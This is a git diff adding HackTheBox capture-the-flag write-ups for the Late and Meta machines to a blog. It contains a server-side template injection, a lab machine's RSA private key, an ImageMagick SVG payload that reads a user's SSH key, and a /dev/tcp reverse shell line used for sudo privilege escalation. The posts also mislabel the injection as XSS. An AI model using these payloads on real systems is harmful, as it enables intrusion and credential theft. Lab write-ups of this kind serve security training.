@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:802bdbb02696148380ed6f5ac2f031eddd12576ad4b35a8feedc6ce25cd965f0
+size 12148
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-9.png b/content/writeup-ctf/writeup-late-htb/img/image-9.png
new file mode 100644
index 0000000..9cc8961
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:02db7f024e1dff7517ed3aa21c989f01464a513c0b519a8c4ce7ca08dd86e232
+size 10881
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-9.webp b/content/writeup-ctf/writeup-late-htb/img/image-9.webp
new file mode 100644
index 0000000..222b991
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1867d5ddadf9b6cf23c42cebf54675dbdeb0b76791803db24e700cdf9852fc20
+size 15606
diff --git a/content/writeup-ctf/writeup-late-htb/index.md b/content/writeup-ctf/writeup-late-htb/index.md
new file mode 100644
index 0000000..c0f6386
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/index.md
@@ -0,0 +1,146 @@
+---
+title: "Writeup - Late (HTB)"
+date: 2022-04-25
+slug: "writeup-late-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Late](https://app.hackthebox.com/machines/Late) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.129.45.153
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.6p1)
+- 80/tcp : HTTP web server (nginx 1.14.0)
+
+![](img/image-2.webp)
+
+## Exploit
+
+First of all, let's start with the enumeration of the site's files.
+
+![](img/image-3.webp)
+
+![](img/image-4.webp)
+
+After some research in the results nothing very interesting in this site. So I scan the subdomains.
+
+![](img/image-5.webp)
+
+I find the `images` subdomain. I add it in the `/etc/hosts` file, then I go to the site.
+
+![](img/image-6.webp)
+
+It is a site that allows to recover text present in an image and to send it back in a file. For that there is a treatment, in particular of the recognition of character. But is there any additional processing?
+
+After some unsuccessful tests I try to perform an XSS (Cross Site Scripting). To try to determine if there is indeed a possibility to do it. I send the following image to the server:
+
+![](img/image-7.webp)
+
+Depending on the answer I will be able to determine if this attack is feasible and also potentially this Framework is used:
+
+- 777777 -> Jinja2
+- 49 -> Twig
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Downloads]
+└─$ cat results.txt 
+<p>7777777
+</p>
+```
+After retrieving the result file we find the answer `7777777`. The XSS is therefore possible and the framework has a great chance to be Jinja2! I go to the following [github](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2) to see the possibilities.
+
+I first try to send the following image:
+
+![](img/image-8.webp)
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Downloads]
+└─$ cat results.txt 
+<p>uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)
+
+</p>
+```
+In the result file I find the expected result, the web application is executed as `svc_acc`. I now try to see if this user has an RSA key that would allow me to connect via SSH:
+
+![](img/image-9.webp)
+
+
+```bash
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM
+HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO
+bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi
+/mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7
+d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7
+7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM
+fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0
+ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz
+W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ
+uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC
+T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH
+Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi
+WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng
+Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7
+t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq
+0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE
+uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y
+3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ
+GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F
+ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb
+Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr
+kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+
+Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL
+K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0
+kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw==
+-----END RSA PRIVATE KEY-----
+```
+Now that I have the RSA key in my possession, I can connect in SSH and get the first flag :
+
+![](img/image-10.webp)
+
+## Privilege escalation
+
+To start I run the [linpeas.sh](https://linpeas.sh) script to get an idea of what is present on the machine. Quickly I find a script `ssh-alert.sh` which is a script belonging to my user, but which is executed by root.
+
+![](img/image-11.webp)
+
+I look at its contents and find that it is a script that generates an alert by mail for each session opened via SSH.
+
+![](img/image-12.webp)
+
+Knowing that I can modify it, I add the following line at the end of the file.
+
+
+```bash
+echo "chmod o+x /bin/bash" >> ssh-alert.sh
+```
+This allows to add to the file a `euid = 0`, which will allow me to execute the script as root. This is the same principle that is used with the su command. I quit the ssh session, I restart it, then I create a bash session with the following command :
+
+![](img/image-13.webp)
+
+I am now root of the machine and I can recover the last flag.
+
+
+```bash
+bash-4.4# cat /root/root.txt 
+0abb3c1b4d046ab54e80851cf85c6448
+```
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update the image converter to avoid XSS
+- Launch web applications with a user with minimum rights and no RSA key
+- Do not let a user-modifiable script be executed by root
diff --git a/content/writeup-ctf/writeup-meta-htb/featured.png b/content/writeup-ctf/writeup-meta-htb/featured.png
new file mode 100644
index 0000000..2fa0036
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d9b123f854cdaf0913e5181bec013df3118a41e734675bfb5c01049f44a24ff0
+size 335341
diff --git a/content/writeup-ctf/writeup-meta-htb/featured.webp b/content/writeup-ctf/writeup-meta-htb/featured.webp
new file mode 100644
index 0000000..2a955ac
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5254672588d76561ea4bc601be5938911792e346ea958fae212fc5202e3eab66
+size 26222
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-1.png b/content/writeup-ctf/writeup-meta-htb/img/image-1.png
new file mode 100644
index 0000000..eea9699
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b7b5c689e473d8fbe5f38d56569bcc4ca6a0954cd219818717b3305fce1ff46a
+size 34361
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-1.webp b/content/writeup-ctf/writeup-meta-htb/img/image-1.webp
new file mode 100644
index 0000000..fca9deb
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:853ef003a811f2876b9c617786e32d66321b9421968b4b0ad84afef84d28ea8e
+size 30872
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-10.png b/content/writeup-ctf/writeup-meta-htb/img/image-10.png
new file mode 100644
index 0000000..19611b7
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fcad2520cf7701c87fb90128edd4eaf113223d4d05af145529a1a0da1ac4e590
+size 16811
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-10.webp b/content/writeup-ctf/writeup-meta-htb/img/image-10.webp
new file mode 100644
index 0000000..164910b
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:783ed4fc9ecc737bde285df0a148d0d079b63946b5f2d2a81f896e712e61757e
+size 21830
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-11.png b/content/writeup-ctf/writeup-meta-htb/img/image-11.png
new file mode 100644
index 0000000..64b49b2
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:705f86e611afda24e6edf49fb3da1cc21c397f01cab01a0f6d8e420a98c7c644
+size 46894
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-11.webp b/content/writeup-ctf/writeup-meta-htb/img/image-11.webp
new file mode 100644
index 0000000..bd51874
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6707d853dc7c153fac5707f0ab21f18576648cd44181e81e318b02a1c8d4c55b
+size 50798
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-12.png b/content/writeup-ctf/writeup-meta-htb/img/image-12.png
new file mode 100644
index 0000000..96ace65
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:86b1a5da73f2997b4e3c8096bc1c5dd8a64cda3b11d8db942e39caa07ef87b8d
+size 17079
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-12.webp b/content/writeup-ctf/writeup-meta-htb/img/image-12.webp
new file mode 100644
index 0000000..b581b34
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:71ac0c4b822e72f5d4565ad40fd869c461aa8adb6dab99f36109337f3a698bce
+size 16432
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-13.png b/content/writeup-ctf/writeup-meta-htb/img/image-13.png
new file mode 100644
index 0000000..54b2cef
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fd3f8a6b78074a7773eb4a39ab6fc755b0a1f2ad87e46f34312983c540ad456a
+size 17702
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-13.webp b/content/writeup-ctf/writeup-meta-htb/img/image-13.webp
new file mode 100644
index 0000000..bf1f3fb
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2a9d91af638f535f4a8ab5aa73669eb257b73b01f87d36e3ce10b94c83b18db4
+size 18794
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-2.png b/content/writeup-ctf/writeup-meta-htb/img/image-2.png
new file mode 100644
index 0000000..b9aee5b
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b623aedcb82404216cce2e83666511da3160eef05e8128cd9cabc42b6d37200c
+size 426544
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-2.webp b/content/writeup-ctf/writeup-meta-htb/img/image-2.webp
new file mode 100644
index 0000000..075f3a6
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:aab7ba3a46c9729e0926da84663aba1cbb3f75a00c54d1c1fbaae48f1fb8771d
+size 62666
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-3.png b/content/writeup-ctf/writeup-meta-htb/img/image-3.png
new file mode 100644
index 0000000..53e5c94
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5615e9cb916408f940b04b704342441c9cb0220e835205b8f3c65d55026ee18e
+size 59451
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-3.webp b/content/writeup-ctf/writeup-meta-htb/img/image-3.webp
new file mode 100644
index 0000000..a233aa4
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e7d86013fd1e3395af6eccc367c1d70528930db41846e188a84975b954e18aa8
+size 48820
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-4.png b/content/writeup-ctf/writeup-meta-htb/img/image-4.png
new file mode 100644
index 0000000..3331bca
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6d11fcec8942c33e8a5b8ae8c50009c00c14e92a7e35838c316f071fdd1eb4e8
+size 45576
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-4.webp b/content/writeup-ctf/writeup-meta-htb/img/image-4.webp
new file mode 100644
index 0000000..cb09238
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2269965ced9ff05d0ae6dc5c19698def5731f750f31021a09a88bb0c8e90cc19
+size 41664
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-5.png b/content/writeup-ctf/writeup-meta-htb/img/image-5.png
new file mode 100644
index 0000000..c8a56ac
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d775632d712642a82e51af075dccae2ba560077bcfb398dd818ed63bcc987baa
+size 13111
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-5.webp b/content/writeup-ctf/writeup-meta-htb/img/image-5.webp
new file mode 100644
index 0000000..374da45
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5beacab68bc524723e60a73148fcbcd7db35ad50107351ff9a0ef2d577a74432
+size 10042
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-6.png b/content/writeup-ctf/writeup-meta-htb/img/image-6.png
new file mode 100644
index 0000000..532949d
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e2a56052b6bc7580a6452888fcbfbfabceebf4dce90482be765b1450a3daffc2
+size 12623
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-6.webp b/content/writeup-ctf/writeup-meta-htb/img/image-6.webp
new file mode 100644
index 0000000..22dab5e
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c42d578f4c3dacae10bb1184e35b6879fca2b63b59edf8664819f54277b86b35
+size 6198
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-7.png b/content/writeup-ctf/writeup-meta-htb/img/image-7.png
new file mode 100644
index 0000000..c383595
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3022af18d3cd2b16ff1a9dd18952e9a6006777aa56eca1d62e70a266bb2b9ed4
+size 39980
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-7.webp b/content/writeup-ctf/writeup-meta-htb/img/image-7.webp
new file mode 100644
index 0000000..dfdacd5
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9fa7725ee1232e07d7ff01d311cb3ae9e0f91641490a218b702fa3333ce5190f
+size 21094
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-8.png b/content/writeup-ctf/writeup-meta-htb/img/image-8.png
new file mode 100644
index 0000000..df3d535
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4d9fbb1ed77c5ed6c273f00d51cf1b4160783117bda2f965e23b70f84d422b89
+size 61515
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-8.webp b/content/writeup-ctf/writeup-meta-htb/img/image-8.webp
new file mode 100644
index 0000000..9d0537d
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8db35e3f99601f628450db664ec996186162a3370b1e2670a3aaf6dd7ecc1222
+size 53324
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-9.png b/content/writeup-ctf/writeup-meta-htb/img/image-9.png
new file mode 100644
index 0000000..da3d308
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a64857ed6a921ae8e02c7283a17bc0ea56698e2cfe8d0299ebf5aa594e93f5c6
+size 13912
diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-9.webp b/content/writeup-ctf/writeup-meta-htb/img/image-9.webp
new file mode 100644
index 0000000..db5a4b8
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:62a8120a76a71d8537ebcb7b1bf2d6202147e44312c3b98e88787e3da95a620d
+size 13348
diff --git a/content/writeup-ctf/writeup-meta-htb/index.md b/content/writeup-ctf/writeup-meta-htb/index.md
new file mode 100644
index 0000000..a181034
--- /dev/null
+++ b/content/writeup-ctf/writeup-meta-htb/index.md
@@ -0,0 +1,153 @@
+---
+title: "Writeup - Meta (HTB)"
+date: 2022-04-03
+slug: "writeup-meta-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Meta](https://app.hackthebox.com/machines/Meta) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.129.119.94
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.9p1)
+- 80/tcp : HTTP web server (Apache httpd)
+
+![](img/image-2.webp)
+
+## Exploit
+
+At first I order by listing the different pages of the site.
+
+![](img/image-3.webp)
+
+Nothing in particular, I continue by making an enumeration of the subdomains.
+
+![](img/image-4.webp)
+
+Ok, there is a subdomain, I add it to the `/etc/hosts` file, then I access it via a browser.
+
+![](img/image-5.webp)
+
+It is a page that redirects us to another page that contains a form to upload a file.
+
+![](img/image-6.webp)
+
+So I try to upload an image to see what the page tells me:
+
+![](img/image-7.webp)
+
+The result reminds me strongly of a crypto tool I already used: `exiftool`.
+
+![](img/image-8.webp)
+
+So I know that on the server side, this tool is used, it's a good information ! So I look if there are exploits with this service. Quickly I find this flaw : CVE-2021-22204. It is an exploit that allows via meta data in an image the execution of instructions. So we can create a reverse shell ! With a little more research I find this [github](https://github.com/convisolabs/CVE-2021-22204-exiftool).
+
+It is a tool for image modification and reverse shell insertion.
+
+
+```bash
+┌──(d3vyce㉿kali)-[~]
+└─$ python3 exploit.py
+    1 image files updated
+```
+Once the image is modified, I upload it and it creates the reverse shell:
+
+![](img/image-9.webp)
+
+I look for the location of the flag with the following command:
+
+
+```bash
+find / -name user.txt 2>/dev/null
+```
+I find that the flag is in `thomas` personal file, but I don't have the rights to read it...
+
+So I am looking for a way to change the user. In the site folder, I find a folder `convert_image`... It is said to be an input folder for a script or a service that would convert images. I am looking for other elements with the same name on the system:
+
+
+```bash
+www-data@meta:/var/www/dev01.artcorp.htb/convert_images$ find / -name convert_image* 2>/dev/null
+<ert_images$ find / -name convert_image* 2>/dev/null     
+/usr/local/bin/convert_images.sh
+/var/www/dev01.artcorp.htb/convert_images
+```
+There is a script with the same name! Looking at the content, I can see that it uses the `[mogrify](https://linux.die.net/man/1/mogrify)` service to perform the conversion of the images in the folder.
+
+
+```bash
+#!/bin/bash
+cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
+pkill mogrify
+```
+I look for the version of the service with the following command:
+
+![](img/image-10.webp)
+
+Then I look if there are some feats. After some research I find this [exploit](https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html). It allows to do a shell injection in an SVG image.
+
+So I use the template provided in the article, then I modify it to get the content of the `id_rsa` file of the user `thomas`.
+
+
+```bash
+<image authenticate='ff" `echo $(cat /home/thomas/.ssh/id_rsa)> /dev/shm/id`;"'>
+  <read filename="pdf:/etc/passwd"/>
+  <get width="base-width" height="base-height" />
+  <resize geometry="400x400" />
+  <write filename="test.png" />
+  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
+  <image xlink:href="msl:poc.svg" height="100" width="100"/>
+  </svg>
+</image>
+```
+Then I copy the file to the `convert_images` folder. After a few seconds I find the newly created file in the `/dev/shm`.
+
+Now that I have this file, I add the privileges and create an SSH session:
+
+![](img/image-11.webp)
+
+I now have a shell as `thomas` and I get the first flag.
+
+## Privilege escalation
+
+I start by checking the sudo permissions of my user. I notice 2 things:
+
+- I have the right to use the command `/usr/bin/neofetch \"\"` as root
+- The environment variable `XDG_CONFIG_HOME` is kept when running sudo
+
+![](img/image-12.webp)
+
+After some research, I find that `neofetch` has a file in configuration in the folder `~/.config/neofetch/`. So I start by putting a reverse shell in this config file.
+
+
+```bash
+thomas@meta:~/.config/neofetch$ cd .config/neofetch/
+thomas@meta:~/.config/neofetch$ echo "/bin/sh -i >& /dev/tcp/10.10.14.40/2345 0>&1" > config.conf
+```
+Then I set the variable `XDG_CONFIG_HOME` with the `.local` of my user. Then I run `neofetch` as sudo.
+
+
+```bash
+thomas@meta:~/.config/neofetch$ export XDG_CONFIG_HOME="$HOME/.config"
+thomas@meta:~/.config/neofetch$ sudo -u root /usr/bin/neofetch \"\"
+```
+I now have a reverse shell `root` and I can get the last flag.
+
+![](img/image-13.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update `exiftool` to avoid CVE-2021-22204
+- Update `mogrify` to avoid shell injection exploit
+- Disable the option to keep the`XDG_CONFIG_HOME` variable at runtime with sudo
diff --git a/content/writeup-ctf/writeup-networked-htb/featured.png b/content/writeup-ctf/writeup-networked-htb/featured.png
new file mode 100644
index 0000000..91b852d
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4c47b86db44402af1e96309d05c74412804b6ec2e4005e11981045edb56c8bb1
+size 381351
diff --git a/content/writeup-ctf/writeup-networked-htb/featured.webp b/content/writeup-ctf/writeup-networked-htb/featured.webp
new file mode 100644
index 0000000..76f295b
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4ba506bb571577254cbf0673f3c4cf22dab0c62a179fbe5d207aa51191392d49
+size 37858
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-1.png b/content/writeup-ctf/writeup-networked-htb/img/image-1.png
new file mode 100644
index 0000000..0d2cd35
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7aad33039dfc3dc6ddb53e26b4282aecc1172caa3cbbe69385db52ffa5dcf0af
+size 36387
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-1.webp b/content/writeup-ctf/writeup-networked-htb/img/image-1.webp
new file mode 100644
index 0000000..9b22e14
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:baf1f6e8811bcf5ff967bfae5c81bb4b952705f734b4436e21bbcc5033241a62
+size 37430
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-10.png b/content/writeup-ctf/writeup-networked-htb/img/image-10.png
new file mode 100644
index 0000000..f7a29f3
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d6291300663d1252430bf610273f951c0b05769d4248d82fc3263018c4bdbe2e
+size 33221
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-10.webp b/content/writeup-ctf/writeup-networked-htb/img/image-10.webp
new file mode 100644
index 0000000..2ec401d
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:42a0bb9589e6e095560a91c515ca3a93201b8aff90d00eda42b87f51b8b148dd
+size 30636
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-11.png b/content/writeup-ctf/writeup-networked-htb/img/image-11.png
new file mode 100644
index 0000000..552e78c
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:27180d60c4ce86c58a410a41f9e2c17d2caba4494cede04bd81fe4106ee3511e
+size 17951
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-11.webp b/content/writeup-ctf/writeup-networked-htb/img/image-11.webp
new file mode 100644
index 0000000..5dfe865
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a7f9b57d088c8f83d5944029681e564c4e95f4f07ae39526fb479457f1952455
+size 29134
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-12.png b/content/writeup-ctf/writeup-networked-htb/img/image-12.png
new file mode 100644
index 0000000..84ed5c8
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f7307cc8697dd70644fd5dc78f033aee0f5dd7b47d26030c41ac15334280d268
+size 16308
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-12.webp b/content/writeup-ctf/writeup-networked-htb/img/image-12.webp
new file mode 100644
index 0000000..dbd08f6
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:308492e1879bcc4e99a02142c67ae081146eb02b5dfec2a8582da02a04c5bd14
+size 15396
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-13.png b/content/writeup-ctf/writeup-networked-htb/img/image-13.png
new file mode 100644
index 0000000..fe8b2d4
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8b48cad07953532e26b027bc64b8219959b278801db72ba3c867532cca6fe9b4
+size 23816
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-13.webp b/content/writeup-ctf/writeup-networked-htb/img/image-13.webp
new file mode 100644
index 0000000..09eeacb
--- /dev/null
+++ b/content/writeup-ctf/writeup-networked-htb/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8c41de94140b934b21ea165ee1f57972e7992544efb178ccaff49f3f8b4b482d
+size 36862
diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-14.png b/content/writeup-ctf/writeup-networked-htb/img/image-14.png
new file mode 100644
index 0000000..06ca7fb
--- /dev/null
